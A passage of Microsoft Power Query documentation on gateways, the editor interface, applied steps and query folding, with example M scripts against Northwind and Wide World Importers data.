gateway named "Gateway B" has been registered and now has access to the folder that
the query requires. The goal is to change the gateway used in this dataflow project so it
uses the new "Gateway B".
Tip
If there were recent changes to your gateways, select the small refresh icon to
the right of the drop-down menu to update the list of available gateways.
3. After selecting the correct gateway for the project, in this case Gateway B, select
OK to go back to the Power Query editor.
7 Note
The M engine identifies a data source using a combination of its kind and path.
The kind defines what connector or data source function is being used, such as SQL
Server, folder, Excel workbook, or others.
The path value is derived from the required parameters of your data source
function and, for this example, that would be the folder path.
The best way to validate the data source path is to go into the query where your data
source function is being used and check the parameters being used for it. For this
example, there's only one query that connects to a folder and this query has the Source
step with the data source path defined in it. You can double-click the Source step to get
the dialog that indicates the parameters used for your data source function. Make sure
that the folder path, or the correct parameters for your data source function, is the
correct one in relation to the gateway being used.
Modify authentication
To modify the credentials used against your data source, select Get data in the Power
Query editor ribbon to launch the Choose data source dialog box, then define a new or
existing connection to your data source. In this example, the connector that's used is the
Folder connector.
Once in Connection settings, create a new connection or select or modify a different
connection for your data source.
After defining the connection details, select Next at the bottom-right corner and
validate that your query is loading in the Power Query editor.
7 Note
This process is the same as if you were to connect again to your data source. But by
doing the process again, you're effectively re-defining what authentication method
and credentials to use against your data source.
The Power Query user interface
Article • 04/10/2023
With Power Query, you can connect to many different data sources and transform the
data into the shape you want.
In this article, you'll learn how to create queries with Power Query by discovering:
If you're new to Power Query, you can sign up for a free trial of Power BI before you
begin. You can use Power BI dataflows to try out the Power Query Online experiences
described in this article.
Examples in this article connect to and use the Northwind OData feed .
https://services.odata.org/V4/Northwind/Northwind.svc/
7 Note
To learn more about where to get data from each of the Microsoft products that
include Power Query, go to Where to get data.
To start, locate the OData feed connector from the "Get Data" experience. You can select
the Other category from the top, or search for OData in the search bar in the top-right
corner.
Once you select this connector, the screen displays the connection settings and
credentials.
For URL, enter the URL to the Northwind OData feed shown in the previous
section.
For On-premises data gateway, leave as none.
For Authentication kind, leave as anonymous.
The Navigator now opens, where you select the tables you want to connect to from the
data source. Select the Customers table to load a preview of the data, and then select
Transform data.
The dialog then loads the data from the Customers table into the Power Query editor.
The above experience of connecting to your data, specifying the authentication method,
and selecting the specific object or table to connect to is called the get data experience
and is documented with further detail in the Getting data article.
7 Note
1. Ribbon: the ribbon navigation experience, which provides multiple tabs to add
transforms, select options for your query, and access different ribbon buttons to
complete various tasks.
2. Queries pane: a view of all your available queries.
3. Current view: your main working view, that by default, displays a preview of the
data for your query. You can also enable the diagram view along with the data
preview view. You can also switch between the schema view and the data preview
view while maintaining the diagram view.
4. Query settings: a view of the currently selected query with relevant information,
such as query name, query steps, and various indicators.
5. Status bar: a bar displaying relevant important information about your query, such
as execution time, total columns and rows, and processing status. This bar also
contains buttons to change your current view.
7 Note
The schema and diagram view are currently only available in Power Query Online.
The ribbon
The ribbon is the component where you'll find most of the transforms and actions that
you can do in the Power Query editor. It has multiple tabs, whose values depend on the
product integration. Each of the tabs provides specific buttons and options, some of
which might be redundant across the whole Power Query experience. These buttons and
options provide you with easy access to the transforms and actions that you may need.
The Power Query interface is responsive and tries to adjust your screen resolution to
show you the best experience. In scenarios where you'd like to use a compact version of
the ribbon, there's also a collapse button at the bottom-right corner of the ribbon to
help you switch to the compact ribbon.
You can switch back to the standard ribbon view by simply clicking on the expand icon
at the bottom-right corner of the ribbon
You're encouraged to try all of these options to find the view and layout that you feel
most comfortable working with. As an example, select Schema view from the ribbon.
The right side of the status bar also contains icons for the diagram, data, and schema
views. You can use these icons to change between views. You can also use these icons to
enable or disable the view of your choice.
7 Note
For example, in schema view, select the check mark next to the Orders and
CustomerDemographics columns, and from the ribbon select the Remove columns
action. This selection applies a transformation to remove these columns from your data.
7 Note
Select OK to perform the operation. Your data preview refreshes to show the total
number of customers by country.
An alternative way to launch the Group by dialog would be to use the Group by button
in the ribbon or by right-clicking the Country column.
For convenience, transforms in Power Query can often be accessed from multiple places,
so users can opt to use the experience they prefer.
First, you'll need to add the Suppliers data. Select Get Data and from the drop-down
menu, and then select OData.
The OData connection experience reappears. Enter the connection settings as described
in Connect to an OData feed to connect to the Northwind OData feed. In the Navigator
experience, search for and select the Suppliers table.
Select Create to add the new query to the Power Query editor. The queries pane should
now display both the Customers and the Suppliers query.
Open the Group by dialog again, this time by selecting the Group by button on the
ribbon under the Transform tab.
In the Group by dialog, set the Group by operation to group by the country and count
the number of supplier rows per country.
7 Note
Referencing queries
Now that you have a query for customers and a query for suppliers, your next goal is to
combine these queries into one. There are many ways to accomplish this, including
using the Merge option in the Customers table, duplicating a query, or referencing a
query. For this example, you'll create a reference by right-clicking the Customers table
and selecting Reference, which effectively creates a new query that references the
Customers query.
After creating this new query, change the name of the query to Country Analysis and
disable the load of the Customers table by unmarking the Enable load option from the
Suppliers query.
Merging queries
A merge queries operation joins two existing tables together based on matching values
from one or multiple columns. In this example, the goal is to join both the Customers
and Suppliers tables into one table only for the countries that have both Customers and
Suppliers.
Inside the Country Analysis query, select the Merge queries option from the Home tab
in the ribbon.
A new dialog for the Merge operation appears. You can then select the query to merge
with your current query. Select the Suppliers query and select the Country field from
both queries. Finally, select the Inner join kind, as you only want the countries where
you have Customers and Suppliers for this analysis.
After selecting the OK button, a new column is added to your Country Analysis query
that contains the data from the Suppliers query. Select the icon next to the Suppliers
field, which displays a menu where you can select which fields you want to expand.
Select only the Suppliers field, and then select the OK button.
The result of this expand operation is a table with only 12 rows. Rename the
Suppliers.Suppliers field to just Suppliers by double-clicking the field name and
entering the new name.
7 Note
To learn more about the Merge queries feature, go to Merge queries overview.
Applied steps
Every transformation that is applied to your query is saved as a step in the Applied
steps section of the query settings pane. If you ever need to check how your query is
transformed from step to step, you can select a step and preview how your query
resolves at that specific point.
You can also right-click a query and select the Properties option to change the name of
the query or add a description for the query. For example, right-click the Merge queries
step from the Country Analysis query and change the name of the query to be Merge
with Suppliers and the description to be Getting data from the Suppliers query for
Suppliers by Country.
This change adds a new icon next to your step that you can hover over to read its
description.
7 Note
To learn more about Applied steps, go to Using the Applied Steps list.
Before moving on to the next section, disable the Diagram view to only use the Data
preview.
Adding a new column
With the data for customers and suppliers in a single table, you can now calculate the
ratio of customers-to-suppliers for each country. Select the last step of the Country
Analysis query, and then select both the Customers and Suppliers columns. In the Add
column tab in the ribbon and inside the From number group, select Standard, and then
Divide (Integer) from the dropdown.
This change creates a new column called Integer-division that you can rename to Ratio.
This change is the final step of your query, and provides the customer-to-supplier ratio
for the countries where the data has customers and suppliers.
Data profiling
Another Power Query feature that can help you better understand your data is Data
Profiling. By enabling the data profiling features, you'll get feedback about the data
inside your query fields, such as value distribution, column quality, and more.
We recommended that you use this feature throughout the development of your
queries, but you can always enable and disable the feature at your convenience. The
following image shows all the data profiling tools enabled for your Country Analysis
query.
7 Note
To learn more about Data profiling, go to Using the data profiling tools.
To access the inline Power Query help information in Excel, select the Help tab on the
Excel ribbon, and then enter Power Query in the search text box.
7 Note
Currently, Azure Analysis Services doesn't contain any inline Power Query help links.
However, you can get help for Power Query M functions. More information is
contained in the next section.
1. With the Power Query editor open, select the insert step ( ) button.
2. In the formula bar, enter the name of a function you want to check.
a. If you are using Power Query Desktop, enter an equal sign, a space, and the
name of a function.
b. If you are using Power Query Online, enter the name of a function.
3. Select the properties of the function.
a. If you are using Power Query Desktop, in the Query Settings pane, under
Properties, select All properties.
b. If you are using Power Query Online, in the Query Settings pane, select
Properties.
These steps will open the inline help information for your selected function, and let you
enter individual properties used by the function.
Summary
In this article, you created a series of queries with Power Query that provides a
customer-to-supplier ratio analysis at the country level for the Northwind corporation.
You learned the components of the Power Query user interface, how to create new
queries inside the query editor, reference queries, merge queries, understand the
applied steps section, add new columns, and how to use the data profiling tools to
better understand your data.
Power Query is a powerful tool used to connect to many different data sources and
transform the data into the shape you want. The scenarios outlined in this article are
examples to show you how you can use Power Query to transform raw data into
important actionable business insights.
Using the Applied Steps list
Article • 08/07/2023
The Applied steps list is part of the Query settings pane in Power Query. Any
transformations to your data is dislayed in the Applied steps list. For instance, if you
change the first column name, the new column name is displayed in the Applied steps
list as Renamed columns.
Selecting any step displays the results of that particular step, so you can see exactly how
your data changes as you add steps to the query.
If you're using Power Query Desktop (Excel, Power BI Desktop, Analysis Services) and the
Query Settings pane is closed, select the View tab from the ribbon, and then select
Query Settings.
The Query Settings pane then opens on the right side with the Applied Steps list.
If you're using Power Query Online (Power BI service, Power Apps, Data Factory
(preview), Microsoft 365 Customer Insights) and the Query settings pane is closed,
select the < icon above Query settings to open the pane.
The Query settings pane then opens on the right side with the Applied steps list.
The following image shows the different parts of the Applied steps list. Currently, not all
of these parts are found in Power Query Desktop. The Applied steps list in Power Query
Desktop only contains the delete step, step name, step description, and step settings
elements. The step icon and query folding indicator are found only in Power Query
Online.
In Power Query Online, if you hover the mouse cursor over one of the applied steps, an
informational display opens, listing the step name, step label, step description, step
settings, information about the step query folding, and a learn more link to the Query
folding indicators article. For more information about query folding, go to Power Query
query folding. The step label is automatically generated when the step is created, and
indicates the step type, as does the step icon. The step label and the step icon can't be
changed.
You can also edit the settings for any step that contains the step settings icon. The two
places where the icon appears is in the applied settings step, and in the informational
display for the step. Just select the icon and the settings page for that particular step is
displayed.
Rename step
To rename a step, right-click the step and select Rename.
Enter in the name you want, and then either select Enter or select away from the step.
Delete step
To delete a step, right-click the step and select Delete.
Alternatively, select the X next to the step.
Delete until end
To delete a series of steps, right-click the first step of the series and select Delete until
end. This action deletes the selected step and all the subsequent steps.
Select Delete in the new window.
The following image shows the Applied steps list after using the Delete until end.
Insert step after
To add a new step, right-click on the last step in the list and select Insert step after.
To insert a new intermediate step, right-click on a step and select Insert step after. Then
select Insert on the new window.
To set a transformation for the new step, select the new step in the list and make the
change to the data. It automatically links the transformation to the selected step.
Move step
To move a step up one position in the list, right-click the step and select Move before.
To move a step down one position in the list, right-click the step and select Move after.
Alternatively, or to move more than a single position, drag and drop the step to the
desired location.
Extract the previous steps into query
You can also separate a series of transformations into a different query. This allows the
query to be referenced for other sources, which can be helpful if you're trying to apply
the same transformation to multiple datasets. To extract all the previous steps into a
new query, right-click the first step you do not want to include in the query and select
Extract Previous.
Name the new query and select OK. To access the new query, navigate to the Queries
pane on the left side of the screen.
Global search box (Preview)
Article • 07/30/2022
The global search box offers you the ability to search for:
The global search box is located at the top center of the Power Query editor. The search
box follows the same design principles that you find in Microsoft Search in Office , but
contextualized to Power Query.
Search results
To make use of the global search box, select the search box or press Alt + Q. Before you
enter anything, you'll be presented with some default options to choose from.
When you start entering something to search for, the results will be updated in real
time, displaying queries, actions, and get data connectors that match the text that
you've entered.
For scenarios where you'd like to see all available options for a given search query, you
can also select the See more results for option. This option is positioned as the last
result of the search box query when there are multiple matches to your query.
Overview of query evaluation and query
folding in Power Query
Article • 02/17/2023
This article provides a basic overview of how M queries are processed and turned into
data source requests.
Tip
You can think of the M script as a recipe that describes how to prepare your data.
The most common way to create an M script is by using the Power Query editor. For
example, when you connect to a data source, such as a SQL Server database, you'll
notice on the right-hand side of your screen that there's a section called applied steps.
This section displays all the steps or transforms used in your query. In this sense, the
Power Query editor serves as an interface to help you create the appropriate M script for
the transforms that you're after, and ensures that the code you use is valid.
7 Note
Display the query as a series of steps and allow the creation or modification of
new steps.
Display a diagram view.
The previous image emphasizes the applied steps section, which contains the following
steps:
Source: Makes the connection to the data source. In this case, it's a connection to a
SQL Server database.
Navigation: Navigates to a specific table in the database.
Removed other columns: Selects which columns from the table to keep.
Sorted rows: Sorts the table using one or more columns.
Kept top rows: Filters the table to only keep a certain number of rows from the top
of the table.
This set of step names is a friendly way to view the M script that Power Query has
created for you. There are several ways to view the full M script. In Power Query, you can
select Advanced Editor in the View tab. You can also select Advanced Editor from the
Query group in the Home tab. In some versions of Power Query, you can also change
the view of the formula bar to show the query script by going into the View tab and
from the Layout group, select Script view > Query script.
Most of the names found in the Applied steps pane are also being used as is in the M
script. Steps of a query are named using something called identifiers in the M language.
Sometimes extra characters are wrapped around step names in M, but these characters
aren’t shown in the applied steps. An example is #"Kept top rows" , which is categorized
as a quoted identifier because of these extra characters. A quoted identifier can be used
to allow any sequence of zero or more Unicode characters to be used as an identifier,
including keywords, whitespace, comments, operators, and punctuators. To learn more
about identifiers in the M language, go to lexical structure.
Any changes that you make to your query through the Power Query editor will
automatically update the M script for your query. For example, using the previous image
as the starting point, if you change the Kept top rows step name to be Top 20 rows, this
change will automatically be updated in the script view.
While we recommend that you use the Power Query editor to create all or most of the
M script for you, you can manually add or modify pieces of your M script. To learn more
about the M language, go to the official docs site for the M language.
7 Note
M script, also referred to as M code, is a term used for any code that uses the M
language. In the context of this article, M script also refers to the code found inside
a Power Query query and accessible through the advanced editor window or
through the script view in the formula bar.
7 Note
While this example showcases a query with a SQL Database as a data source, the
concept applies to queries with or without a data source.
When Power Query reads your M script, it runs the script through an optimization
process to more efficiently evaluate your query. In this process, it determines which
steps (transforms) from your query can be offloaded to your data source. It also
determines which other steps need to be evaluated using the Power Query engine. This
optimization process is called query folding, where Power Query tries to push as much of
the possible execution to the data source to optimize your query's execution.
) Important
All rules from the Power Query M formula language (also known as the M
language) are followed. Most notably, lazy evaluation plays an important role
during the optimization process. In this process, Power Query understands what
specific transforms from your query need to be evaluated. Power Query also
understands what other transforms don't need to be evaluated because they're not
needed in the output of your query.
Furthermore, when multiple sources are involved, the data privacy level of each
data source is taken into consideration when evaluating the query. More
information: Behind the scenes of the Data Privacy Firewall
The following diagram demonstrates the steps that take place in this optimization
process.
1. The M script, found inside the advanced editor, is submitted to the Power Query
engine. Other important information is also supplied, such as credentials and data
source privacy levels.
2. The Query folding mechanism submits metadata requests to the data source to
determine the capabilities of the data source, table schemas, relationships between
different entities at the data source, and more.
3. Based on the metadata received, the query folding mechanism determines what
information to extract from the data source and what set of transformations need
to happen inside the Power Query engine. It sends the instructions to two other
components that take care of retrieving the data from the data source and
transforming the incoming data in the Power Query engine if necessary.
4. Once the instructions have been received by the internal components of Power
Query, Power Query sends a request to the data source using a data source query.
5. The data source receives the request from Power Query and transfers the data to
the Power Query engine.
6. Once the data is inside Power Query, the transformation engine inside Power
Query (also known as mashup engine) does the transformations that couldn't be
folded back or offloaded to the data source.
7. The results derived from the previous point are loaded to a destination.
7 Note
Depending on the transformations and data source used in the M script, Power
Query determines if it will stream or buffer the incoming data.
The query folding mechanism accomplishes this goal by translating your M script to a
language that can be interpreted and executed by your data source. It then pushes the
evaluation to your data source and sends the result of that evaluation to Power Query.
This operation often provides a much faster query execution than extracting all the
required data from your data source and running all transforms required in the Power
Query engine.
When you use the get data experience, Power Query guides you through the process
that ultimately lets you connect to your data source. When doing so, Power Query uses
a series of functions in the M language categorized as accessing data functions. These
specific functions use mechanisms and protocols to connect to your data source using a
language that your data source can understand.
However, the steps that follow in your query are the steps or transforms that the query
folding mechanism attempts to optimize. It then checks if they can be offloaded to your
data source instead of being processed using the Power Query engine.
) Important
All data source functions, commonly shown as the Source step of a query, queries
the data at the data source in its native language. The query folding mechanism is
utilized on all transforms applied to your query after your data source function so
they can be translated and combined into a single data source query or as many
transforms that can be offloaded to the data source.
Depending on how the query is structured, there could be three possible outcomes to
the query folding mechanism:
Full query folding: When all of your query transformations get pushed back to the
data source and minimal processing occurs at the Power Query engine.
Partial query folding: When only a few transformations in your query, and not all,
can be pushed back to the data source. In this case, only a subset of your
transformations is done at your data source and the rest of your query
transformations occur in the Power Query engine.
No query folding: When the query contains transformations that can't be
translated to the native query language of your data source, either because the
transformations aren't supported or the connector doesn't support query folding.
For this case, Power Query gets the raw data from your data source and uses the
Power Query engine to achieve the output you want by processing the required
transforms at the Power Query engine level.
7 Note
Leveraging a data source that has more processing resources and has query folding
capabilities can expedite your query loading times as the processing occurs at the
data source and not at the Power Query engine.
Next steps
For detailed examples of the three possible outcomes of the query folding mechanism,
go to Query folding examples.
For information about query folding indicators found in the Applied Steps pane, go to
Query folding indicators
Power Query query folding
Article • 08/31/2022
This article targets data modelers developing models in Power Pivot or Power BI
Desktop. It describes what Power Query query folding is, and why it's important in your
data model designs. This article also describes the data sources and transformations that
can achieve query folding, and how to determine that your Power Query queries can be
folded—whether fully or partially.
Query folding is the ability for a Power Query query to generate a single query
statement to retrieve and transform source data. The Power Query mashup engine
strives to achieve query folding whenever possible for reasons of efficiency.
Query folding is an important topic for data modeling for several reasons:
Import model tables: Data refresh will take place efficiently for Import model
tables (Power Pivot or Power BI Desktop), in terms of resource utilization and
refresh duration.
DirectQuery and Dual storage mode tables: Each DirectQuery and Dual storage
mode table (Power BI only) must be based on a Power Query query that can be
folded.
Incremental refresh: Incremental data refresh (Power BI only) will be efficient, in
terms of resource utilization and refresh duration. In fact, the Power BI Incremental
Refresh configuration window will notify you of a warning should it determine that
query folding for the table can't be achieved. If it can't be achieved, the goal of
incremental refresh is defeated. The mashup engine would then be required to
retrieve all source rows, and then apply filters to determine incremental changes.
Query folding may occur for an entire Power Query query, or for a subset of its steps.
When query folding cannot be achieved—either partially or fully—the Power Query
mashup engine must compensate by processing data transformations itself. This process
can involve retrieving source query results, which for large datasets is very resource
intensive and slow.
We recommend that you strive to achieve efficiency in your model designs by ensuring
query folding occurs whenever possible.
Generally, the following list describes transformations that can be query folded.
Removing columns.
Filtering rows, with static values or Power Query parameters (WHERE clause
predicates).
Expanding record columns (source foreign key columns) to achieve a join of two
source tables (JOIN clause).
Non-fuzzy merging of fold-able queries based on the same source (JOIN clause).
Appending fold-able queries based on the same source (UNION ALL operator).
Adding custom columns with simple logic (SELECT column expressions). Simple
logic implies uncomplicated operations, possibly including the use of M functions
that have equivalent functions in the SQL data source, like mathematic or text
manipulation functions. For example, the following expressions return the year
component of the OrderDate column value (to return a numeric value).
Power Query M
Date.Year([OrderDate])
Adding custom columns with complex logic. Complex logic implies the use of M
functions that have no equivalent functions in the data source. For example, the
following expressions format the OrderDate column value (to return a text value).
Power Query M
Date.ToText([OrderDate], "yyyy")
Note that when a Power Query query encompasses multiple data sources,
incompatibility of data source privacy levels can prevent query folding from taking
place. For more information, see the Power BI Desktop privacy levels article.
The View Native Query option is only available for certain relational DB/SQL
generating connectors. It doesn't work for OData based connectors, for example,
even though there is folding occurring on the backend. The Query Diagnostics
feature is the best way to see what folding has occurred for non-SQL connectors
(although the steps that fold aren't explicitly called out—you just see the resulting
URL that was generated).
To view the folded query, you select the View Native Query option. You're then be
presented with the native query that Power Query will use to source data.
If the View Native Query option isn't enabled (greyed out), this is evidence that not all
query steps can be folded. However, it could mean that a subset of steps can still be
folded. Working backwards from the last step, you can check each step to see if the
View Native Query option is enabled. If so, then you've learned where, in the sequence
of steps, that query folding could no longer be achieved.
Next steps
For more information about query folding and related articles, check out the following
resources:
This article provides some example scenarios for each of the three possible outcomes
for query folding. It also includes some suggestions on how to get the most out of the
query folding mechanism, and the effect that it can have in your queries.
The scenario
Imagine a scenario where, using the Wide World Importers database for Azure Synapse
Analytics SQL database, you're tasked with creating a query in Power Query that
connects to the fact_Sale table and retrieves the last 10 sales with only the following
fields:
Sale Key
Customer Key
Invoice Date Key
Description
Quantity
7 Note
For demonstration purposes, this article uses the database outlined on the tutorial
on loading the Wide World Importers database into Azure Synapse Analytics. The
main difference in this article is the fact_Sale table only holds data for the year
2000, with a total of 3,644,356 rows.
While the results might not exactly match the results that you get by following the
tutorial from the Azure Synapse Analytics documentation, the goal of this article is
to showcase the core concepts and impact that query folding can have in your
queries.
This article showcases three ways to achieve the same output with different levels of
query folding:
No query folding
Partial query folding
Full query folding
) Important
Queries that rely solely on unstructured data sources or that don't have a compute
engine, such as CSV or Excel files, don't have query folding capabilities. This means
that Power Query evaluates all the required data transformations using the Power
Query engine.
After connecting to your database and navigating to the fact_Sale table, you select the
Keep bottom rows transform found inside the Reduce rows group of the Home tab.
After selecting this transform, a new dialog appears. In this new dialog, you can enter
the number of rows that you'd like to keep. For this case, enter the value 10, and then
select OK.
Tip
For this case, performing this operation yields the result of the last ten sales. In
most scenarios, we recommend that you provide a more explicit logic that defines
which rows are considered last by applying a sort operation on the table.
Next, select the Choose columns transform found inside the Manage columns group of
the Home tab. You can then select the columns you want to keep from your table and
remove the rest.
Lastly, inside the Choose columns dialog, select the Sale Key , Customer Key , Invoice
Date Key , Description , and Quantity columns, and then select OK.
The following code sample is the full M script for the query you created:
Power Query M
let
Source = Sql.Database(ServerName, DatabaseName),
Navigation = Source{[Schema = "wwi", Item = "fact_Sale"]}[Data],
#"Kept bottom rows" = Table.LastN(Navigation, 10),
#"Choose columns" = Table.SelectColumns(#"Kept bottom rows", {"Sale Key",
"Customer Key", "Invoice Date Key", "Description", "Quantity"})
in
#"Choose columns""
Each box in the previous image is called a node. A node represents the operation
breakdown to fulfill this query. Nodes that represent data sources, such as SQL Server in
the example above and the Value.NativeQuery node, represent which part of the query
is offloaded to the data source. The rest of the nodes, in this case Table.LastN and
Table.SelectColumns highlighted in the rectangle in the previous image, are evaluated
by the Power Query engine. These two nodes represent the two transforms that you
added, Kept bottom rows and Choose columns. The rest of the nodes represent
operations that happen at your data source level.
To see the exact request that is sent to your data source, select View details in the
Value.NativeQuery node.
This data source request is in the native language of your data source. For this case, that
language is SQL and this statement represents a request for all the rows and fields from
the fact_Sale table.
Consulting this data source request can help you better understand the story that the
query plan tries to convey:
Sql.Database : This node represents the data source access. Connects to the
database and sends metadata requests to understand its capabilities.
Value.NativeQuery : Represents the request that was generated by Power Query to
fulfill the query. Power Query submits the data requests in a native SQL statement
to the data source. In this case, that represents all records and fields (columns)
from the fact_Sale table. For this scenario, this case is undesirable, as the table
contains millions of rows and the interest is only in the last 10.
Table.LastN : Once Power Query receives all records from the fact_Sale table, it
uses the Power Query engine to filter the table and keep only the last 10 rows.
Table.SelectColumns : Power Query will use the output of the Table.LastN node
and apply a new transform called Table.SelectColumns , which selects the specific
columns that you want to keep from a table.
For its evaluation, this query had to download all rows and fields from the fact_Sale
table. This query took an average of 6 minutes and 1 second to be processed in a
standard instance of Power BI dataflows (which accounts for the evaluation and loading
of data to dataflows).
Inside the Choose columns dialog, select the Sale Key , Customer Key , Invoice Date
Key , Description , and Quantity columns and then select OK.
You now create logic that will sort the table to have the last sales at the bottom of the
table. Select the Sale Key column, which is the primary key and incremental sequence
or index of the table. Sort the table using only this field in ascending order from the
context menu for the column.
Next, select the table contextual menu and choose the Keep bottom rows transform.
In Keep bottom rows, enter the value 10, and then select OK.
The following code sample is the full M script for the query you created:
Power Query M
let
Source = Sql.Database(ServerName, DatabaseName),
Navigation = Source{[Schema = "wwi", Item = "fact_Sale"]}[Data],
#"Choose columns" = Table.SelectColumns(Navigation, {"Sale Key", "Customer
Key", "Invoice Date Key", "Description", "Quantity"}),
#"Sorted rows" = Table.Sort(#"Choose columns", {{"Sale Key",
Order.Ascending}}),
#"Kept bottom rows" = Table.LastN(#"Sorted rows", 10)
in
#"Kept bottom rows"
You can right-click the last step of your query, the one named Kept bottom rows , and
select the Query plan option to better understand how your query might be evaluated.
Each box in the previous image is called a node. A node represents every process that
needs to happen (from left to right) in order for your query to be evaluated. Some of
these nodes can be evaluated at your data source while others, like the node for
Table.LastN , represented by the Kept bottom rows step, are evaluated using the Power
Query engine.
To see the exact request that is sent to your data source, select View details in the
Value.NativeQuery node.
This request is in the native language of your data source. For this case, that language is
SQL and this statement represents a request for all the rows, with only the requested
fields from the fact_Sale table ordered by the Sale Key field.
Consulting this data source request can help you better understand the story that the
full query plan tries to convey. The order of the nodes is a sequential process that starts
by requesting the data from your data source:
For its evaluation, this query had to download all rows and only the required fields from
the fact_Sale table. It took an average of 3 minutes and 4 seconds to be processed in a
standard instance of Power BI dataflows (which accounts for the evaluation and loading
of data to dataflows).
Full query folding example
After connecting to the database and navigating to the fact_Sale table, start by
selecting the columns that you want to keep from your table. Select the Choose
columns transform found inside the Manage columns group from the Home tab. This
transform helps you to explicitly select the columns that you want to keep from your
table and remove the rest.
In Choose columns, select the Sale Key , Customer Key , Invoice Date Key , Description ,
and Quantity columns, and then select OK.
You now create logic that will sort the table to have the last sales at the top of the table.
Select the Sale Key column, which is the primary key and incremental sequence or
index of the table. Sort the table only using this field in descending order from the
context menu for the column.
Next, select the table contextual menu and choose the Keep top rows transform.
In Keep top rows, enter the value 10, and then select OK.
The following code sample is the full M script for the query you created:
Power Query M
let
Source = Sql.Database(ServerName, DatabaseName),
Navigation = Source{[Schema = "wwi", Item = "fact_Sale"]}[Data],
#"Choose columns" = Table.SelectColumns(Navigation, {"Sale Key", "Customer
Key", "Invoice Date Key", "Description", "Quantity"}),
#"Sorted rows" = Table.Sort(#"Choose columns", {{"Sale Key",
Order.Descending}}),
#"Kept top rows" = Table.FirstN(#"Sorted rows", 10)
in
#"Kept top rows"
You can right-click the last step of your query, the one named Kept top rows, and select
the option that reads Query plan.
This request is in the native language of your data source. For this case, that language is
SQL and this statement represents a request for all the rows and fields from the
fact_Sale table.
Consulting this data source query can help you better understand the story that the full
query plan tries to convey:
7 Note
While there's no clause that can be used to SELECT the bottom rows of a table in
the T-SQL language, there's a TOP clause that retrieves the top rows of a table.
For its evaluation, this query only downloads 10 rows, with only the fields that you
requested from the fact_Sale table. This query took an average of 31 seconds to be
processed in a standard instance of Power BI dataflows (which accounts for the
evaluation and loading of data to dataflows).
Performance comparison
To better understand the affect that query folding has in these queries, you can refresh
your queries, record the time it takes to fully refresh each query, and compare them. For
simplicity, this article provides the average refresh timings captured using the Power BI
dataflows refresh mechanic while connecting to a dedicated Azure Synapse Analytics
environment with DW2000c as the service level.
It's often the case that a query that fully folds back to the data source outperforms
similar queries that don't completely fold back to the data source. There could be many
reasons why this is the case. These reasons range from the complexity of the transforms
that your query performs, to the query optimizations implemented at your data source,
such as indexes and dedicated computing, and network resources. Still, there are two
specific key processes that query folding tries to use that minimizes the affect that both
of these processes have with Power Query:
Data in transit
Transforms executed by the Power Query engine
The following sections explain the affect that these two processes have in the previously
mentioned queries.
Data in transit
When a query gets executed, it tries to fetch the data from the data source as one of its
first steps. What data is fetched from the data source is defined by the query folding
mechanism. This mechanism identifies the steps from the query that can be offloaded to
the data source.
The following table lists the number of rows requested from the fact_Sale table of the
database. The table also includes a brief description of the SQL statement sent to
request such data from the data source.
No None 3644356 Request for all fields and all records from the fact_Sale table
query
folding
Partial Partial 3644356 Request for all records, but only required fields from the
query fact_Sale table after it was sorted by the Sale Key field
folding
Full Full 10 Request for only the required fields and the TOP 10 records of
query the fact_Sale table after being sorted in descending order by
folding the Sale Key field
When requesting data from a data source, the data source needs to compute the results
for the request and then send the data to the requestor. While the computing resources
have already been mentioned, the network resources of moving the data from the data
source to Power Query, and then have Power Query be able to effectively receive the
data and prepare it for the transforms that will happen locally can take some time
depending on the size of the data.
For the showcased examples, Power Query had to request over 3.6 million rows from the
data source for the no query folding and partial query folding examples. For the full
query folding example, it only requested 10 rows. For the fields requested, the no query
folding example requested all the available fields from the table. Both the partial query
folding and the full query folding examples only submitted a request for exactly the
fields that they needed.
U Caution
The following table showcases the nodes from the query plans of the previous queries
that would have been evaluated by the Power Query engine.
For the examples showcased in this article, the full query folding example doesn't
require any transforms to happen inside the Power Query engine as the required output
table comes directly from the data source. In contrast, the other two queries required
some computation to happen at the Power Query engine. Because of the amount of
data that needs to be processed by these two queries, the process for these examples
takes more time than the full query folding example.
Type of Description
Operator
Remote Operators that are data source nodes. The evaluation of these operators occurs
outside of Power Query.
Type of Description
Operator
Streaming Operators are pass-through operators. For example, Table.SelectRows with a simple
filter can usually filter the results as they pass through the operator, and won’t need
to gather all rows before moving the data. Table.SelectColumns and
Table.ReorderColumns are other examples of these sort of operators.
Full scan Operators that need to gather all the rows before the data can move on to the next
operator in the chain. For example, to sort data, Power Query needs to gather all the
data. Other examples of full scan operators are Table.Group , Table.NestedJoin , and
Table.Pivot .
Tip
While not every transform is the same from a performance standpoint, in most
cases, having fewer transforms is usually better.
7 Note
Before reading this article, we recommended that you read Overview of query
evaluation and query folding in Power Query to better understand how folding
works in Power Query.
Query folding indicators help you understand the steps that fold or don't fold.
With query folding indicators, it becomes obvious when you make a change that breaks
folding. This feature helps you to more easily resolve issues quickly, avoid performance
issues in the first place, and have better insight into your queries. In most cases you run
into, steps will fold or won't fold. But there are many cases where the outcome isn't as
obvious, and these cases are discussed in Step diagnostics indicators (Dynamic, Opaque,
and Unknown).
7 Note
The query folding indicators feature is available only for Power Query Online.
This interpretation works even with a simple query against a SQL source. For example,
using the AdventureWorks sample database, connect to the Production.Product table
and load data. Loading this sample through the Power Query navigator gives the
following query:
Power Query M
let
Source = Sql.Database("ServerName", "AdventureWorks"),
Navigation = Source{[Schema = "Production", Item = "Product"]}[Data]
in
Navigation
If you examine how this code shows up in query folding indicators, you'll note that the
first step is inconclusive. But the second step does fold, which means that the query up
to that point does fold.
In this example, the initial steps can't be confirmed to fold (is inconclusive), but the final
step generated when you load data initially does fold. How the first steps (Source, and
sometimes other Navigation steps) are handled depends on the connector. With SQL,
for example, it's handled as a catalog table value, which doesn't fold. However, as soon
as you select data for that connector, it will fold.
Conversely, this can also mean that your query folds up to a point and then stops
folding. Unlike in the case where you have a folding indicator for the step that shows
that everything folds, when you have a not-folding indicator it doesn't mean that
everything doesn't fold. Instead, it means that "not everything" folds. Generally,
everything up to the last folding indicator will fold, with more operations happening
after.
Modifying the example from above, you can give a transform that never folds—
Capitalize Each Word.
Power Query M
let
Source = Sql.Database("ServerName", "AdventureWorks"),
Navigation = Source{[Schema = "Production", Item = "Product"]}[Data],
#"Capitalized each word" = Table.TransformColumns(Navigation, {{"Name",
each Text.Proper(_), type text}})
in
#"Capitalized each word"
In the query folding indicators, you have the same indicators as above, except the final
step doesn't fold. Everything up to this final step will be performed on the data source,
while the final step will be performed locally.
Step diagnostics indicators
